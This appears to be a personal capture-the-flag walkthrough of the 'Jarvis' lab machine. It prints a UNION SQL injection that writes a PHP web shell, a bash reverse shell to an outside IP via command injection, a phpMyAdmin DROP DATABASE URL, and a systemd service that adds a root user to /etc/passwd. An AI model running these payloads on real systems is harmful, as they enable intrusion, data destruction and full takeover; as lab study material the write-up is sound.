Jarvis #24 SQL Injection (UNION) & abusing systemctl with wrong permission.

Nmap scan result: 
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
​
Port 80 Enum:
\
​
Creds? 
[email protected]
supersecurehotel.htb
found a php admin page
These are the ones for the record 
We could try some manual SQL injection? 
phpMyAdmin 4.8.0 
​
http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]
I got stuck here...
I saw something strange when I clicked the image in the home page.
entering single quatation, "'" in the param, the picture disappears 
By incrementing the column number, I see that picture disappears at 8, which means there are 7 columns.
Union Select method: 
-1 union select 1,2,3,4,5,6,7
We can see that the data changed. 
http://supersecurehotel.htb/room.php?cod=-1%20union%20select%201,database(),3,4,5,6,7
Extracting data with union 
load_file('/etc/passwd')
Can we run a command? 
​
http://supersecurehotel.htb/room.php?cod=-1%20union%20select%201,%3C?php%20system($_REQUEST[%22exec%22]);%20?%3E,3,4,5,6,7%20into%20outfile%20%27/var/www/html/gori.php%27
​
'<?php system($_REQUEST["exec"]); ?>'
code execution is enabled. 
python reverse shell worked 
user pepper found
sudo -l 
​
running the file with the user pepper: 
It takes our input (it assumes that it’s an ip) and executes ping on it, to prevent command injection it checks for these characters:
& ; - ` || |
However, It doesn’t check for the dollar sign ($), the dollar sign can be used to execute commands like this: $(command)
So for example if we do ping -c 1 $(echo 127.0.0.1), echo 127.0.0.1 will be executed first then the ping command will be executed:
​
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.18/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
and run the same script 
--- we could've also done ($bash)
Now we are pepper! 
Exploit suggester: 
 
find / -perm -4000 2>/dev/null
This was super cool!!! 
​
Another way to root:
​
I created a service that executes /dev/shm/root.sh:
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
And I created /dev/shm/root.sh which echoes:
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
to /etc/passwd to enable us to su as root with the credentials rooot : AAAA. (Check Ghoul).

[email protected]:/dev/shm$ nano root.service
[email protected]:/dev/shm$ cat root.service
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
[email protected]:/dev/shm$ nano root.sh
[email protected]:/dev/shm$ chmod +x root.sh
[email protected]:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
[email protected]:/dev/shm$ 
I enabled the service and started it:
[email protected]:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
[email protected]:/dev/shm$ systemctl start root.service
[email protected]:/dev/shm$
Now if we check /etc/passwd we’ll see that it has been modified:
[email protected]:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
[email protected]:/dev/shm$
[email protected]:/dev/shm$ su rooot 
Password: 
[email protected]:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/dev/shm# whoami
root
OpenAdmin #25
Help #23 SQL injection, eBPF priv esc (Linux)
Last modified 1yr ago